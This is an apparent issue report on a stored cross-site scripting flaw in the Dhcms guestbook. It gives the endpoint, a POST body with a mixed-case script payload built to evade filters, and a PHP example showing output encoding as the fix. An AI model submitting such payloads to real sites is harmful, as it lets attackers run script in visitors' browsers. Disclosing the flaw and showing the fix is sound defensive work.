Dhcms Stored-XSS Vulnerabilities in guestbook #3

Open
@epony4c

Details of the hole in the guestbook:

```
http://192.168.3.56/dhcms/api.php?r=dhcms/Form/push

POST:
content=1'"()%26%25<ScRiPt%20>alert(5555)</ScRiPt>&email=sample%40email.tst&keyword=e&model=1&name=e&table=guestbook&token=+7c817f9ed88f10ea0b0070efe974c29c+
```

You can execute the alert.

http://192.168.3.56/dhcms/index.php?r=DhCms/Form/index&name=guestbook
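
As an added example (not part of the original report, and not Dhcms code): output encoding applied when a guestbook entry is rendered, run against the field values from the request above. `naive_filter`, `e` and `render_entry` are hypothetical names, and how Dhcms itself stores and renders entries is not shown on this page.

```php
<?php
declare(strict_types=1);

// Constructed sample row: field values from the report's POST body, URL-decoded.
$row = [
    'name'    => 'e',
    'email'   => 'sample@email.tst',
    'content' => '1\'"()&%<ScRiPt >alert(5555)</ScRiPt>',
];

// Hypothetical weak defence: case-sensitive removal of exact tag strings.
// The mixed case and the space before ">" in the payload make it a no-op.
function naive_filter(string $s): string
{
    return str_replace(['<script>', '</script>'], '', $s);
}

// Output encoding for HTML text and quoted-attribute contexts.
// ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical template helper: every user-supplied field is encoded at
// render time, regardless of what was accepted into storage.
function render_entry(array $row): string
{
    return sprintf(
        '<li class="entry"><b>%s</b> (%s): <span>%s</span></li>',
        e($row['name']),
        e($row['email']),
        e($row['content'])
    );
}

$filtered = naive_filter($row['content']);
$html     = render_entry($row);

echo 'naive filter changed input: ', var_export($filtered !== $row['content'], true), PHP_EOL;
echo 'encoded entry: ', $html, PHP_EOL;
// Case-insensitive check that no raw script tag from the stored value survives.
echo 'raw script tag in output: ', var_export(stripos($html, '<script') !== false, true), PHP_EOL;
```

Encoding belongs at the point of output because the same stored value may later be rendered in other contexts (attribute, JavaScript, URL), each of which needs its own encoder.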
